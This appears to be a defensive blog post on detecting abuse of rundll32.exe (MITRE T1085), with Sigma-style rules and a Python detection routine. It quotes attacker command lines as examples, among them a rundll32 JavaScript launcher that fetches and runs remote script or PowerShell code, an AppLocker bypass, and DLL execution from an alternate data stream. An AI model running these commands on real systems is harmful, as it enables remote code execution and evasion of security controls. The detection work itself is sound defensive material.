Launching a strange binary file on a target endpoint is a good way to raise alarm bells within the target organization’s SOC. One of the more common #LOLBINS we see is RunDLL32.exe being used to execute malicious DLL files. This technique is well documented in MITRE’s ATT&CK framework under T1085.
In this post, we look at detection approaches for 4 sub-techniques. In each case the assumption is that you are logging process creation with command lines, either with Sysmon or at least with Event ID 4688 (which only carries the command line when command-line auditing is enabled).
Note: Credit for items #1 and #2 goes to the brilliant folks at https://lolbasproject.github.io/lolbas.
SubTechnique 1 – JavaScript ActiveX Objects
Executing a simple JavaScript downloader.
This behavior has been used by malware such as Poweliks.
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"
Using Rundll32.exe to execute JavaScript that runs a PowerShell script downloaded from a remote web site.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
Using Rundll32.exe to execute a JavaScript script that runs calc.exe. This will bypass AppLocker even if calc.exe is not on the allowed list.
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Using Rundll32.exe to execute JavaScript that runs calc.exe and then kills the Rundll32.exe process that was started.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
SIGMA Friendly Detection Logic:
image=rundll32.exe AND (commandLine="*ActiveXObject*" OR commandLine="*WScript.Shell*" OR commandLine="*RunHTMLApplication*")
The OR terms need the parentheses: without them the image check only applies to the first term, and the rule fires on any process whose command line mentions WScript.Shell or RunHTMLApplication.
SubTechnique 2 – Alternate data streams
Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
SIGMA Friendly Detection Logic:
image=rundll32.exe | regex commandLine="/^rundll32.+\\[^\\:\s]+:[^\\:\s]+\..+$/"
The colon has to follow a path segment (hence the backslash before it); a bare "anything, colon, anything" pattern would also match the drive-letter colon in every fully qualified rundll32 command line.
SubTechnique 3 – Point Function Call
RunDll32 can be used to launch an executable by calling a DLL export named PointFunctionCall. This technique was used by a suspected APT group (APT29).
"C:\Windows\system32\rundll32.exe" C:\Users\Administrator\AppData\Local\cyzfc.dat, PointFunctionCall
SIGMA Friendly Detection Logic:
image=rundll32.exe AND commandLine="*PointFunctionCall*"
SubTechnique 4 – Network HTTP(s) call for additional payloads
Rundll32 can be used to launch a custom DLL that pulls down malware from the internet. The example below comes from the Slimware PUA.
Rundll32.exe "C:\Users\*\AppData\Local\OnlineFormFinderTooltab\TooltabExtension.dll",A -hp=https://hp.myway.com/onlineformfinder/ttab02/index.html -ua="(Windows NT 10.0; Win64; MSIE 11.1747; Build 16299; SP 0)" -ul=https://anx.mindspark.com/anx.gif?anxa=%251&anxe=%252&anxt=CE87BC6F-A080-40BF-8E3B-4EE1C18EDBB7&anxtv=2.7.1.3000&anxp=^CPW^xdm373^TTAB02^us&anxsi=&anxv=%253&anxd=2020-04-01&anxr=%254 -hu=SHOW
SIGMA Friendly Detection Logic:
image=rundll32.exe AND (commandLine="*\\users\\*http*" AND NOT commandLine="*yourdomain.com*")
Replace yourdomain.com with the domains your own software legitimately fetches from a DLL under a user profile, otherwise internal updaters will keep tripping this rule.
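The four rules above as one Python detection routine, added here as an example and not code from the original post: the keyword OR is grouped under the rundll32 image check, the ADS pattern requires the colon to follow a path segment rather than the drive letter, and an allow-list stands in for yourdomain.com. The sample events are constructed (the post's own commands, with the Slimware one shortened, plus benign look-alikes that must not fire).

```python
import re

# Sub-technique 1: keyword terms. They are grouped under the rundll32 image check; an
# ungrouped "image=x AND a OR b OR c" would fire on any process whose command line has b or c.
JS_TERMS = ("activexobject", "wscript.shell", "runhtmlapplication")

# Sub-technique 2: a colon ending a path segment, directly followed by a stream name
# (C:\ads\file.txt:ADSDLL.dll). The leading backslash keeps the drive-letter colon out.
ADS_RE = re.compile(r'\\[^\\:\s"]+:[^\\:\s"/]+')

# Sub-technique 4: a DLL under a user profile plus an http(s) URL in the arguments,
# minus an allow-list (the post's "yourdomain.com" placeholder).
USER_HTTP_RE = re.compile(r"\\users\\.*https?://", re.IGNORECASE)
ALLOWED_DOMAINS = ("yourdomain.com",)

def is_rundll32(image):
    return image.rsplit("\\", 1)[-1].lower() == "rundll32.exe"

def detect(image, cmdline):
    """Return the names of the sub-technique rules that fire for one process-creation event."""
    if not is_rundll32(image):
        return []
    hits, lower = [], cmdline.lower()
    if any(term in lower for term in JS_TERMS):
        hits.append("js_activex")
    if ADS_RE.search(cmdline):
        hits.append("ads_dll")
    if "pointfunctioncall" in lower:
        hits.append("pointfunctioncall")
    if USER_HTTP_RE.search(cmdline) and not any(d in lower for d in ALLOWED_DOMAINS):
        hits.append("user_dll_http")
    return hits

# Constructed sample events (image, command line): the post's own examples first (the
# Slimware one shortened), then benign look-alikes that the rules must not flag.
SAMPLE_EVENTS = [
    ("rundll32.exe", r'rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");'),
    ("rundll32.exe", r'rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain'),
    ("C:\\Windows\\system32\\rundll32.exe", r'"C:\Windows\system32\rundll32.exe" C:\Users\Administrator\AppData\Local\cyzfc.dat, PointFunctionCall'),
    ("rundll32.exe", r'Rundll32.exe "C:\Users\bob\AppData\Local\Tooltab\TooltabExtension.dll",A -hp=https://hp.myway.com/index.html'),
    ("rundll32.exe", r"rundll32.exe C:\Windows\system32\shell32.dll,Control_RunDLL"),
    ("powershell.exe", r'powershell.exe -c "(New-Object -ComObject WScript.Shell).SpecialFolders(\"Desktop\")"'),
    ("rundll32.exe", r'rundll32.exe "C:\Users\bob\AppData\Local\corp\updater.dll",Run -u=https://updates.yourdomain.com/'),
]

def scan(events=SAMPLE_EVENTS):
    """Map each command line to the rules it triggers; an empty list means benign."""
    return {cmd: detect(img, cmd) for img, cmd in events}
```

Calling scan() returns a hit for each of the first four events and nothing for the shell32 control-panel call, the PowerShell one-liner that mentions WScript.Shell, and the allow-listed updater.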
References:
– https://lolbas-project.github.io/lolbas/Binaries/Rundll32
– https://attack.mitre.org/techniques/T1085/
– https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html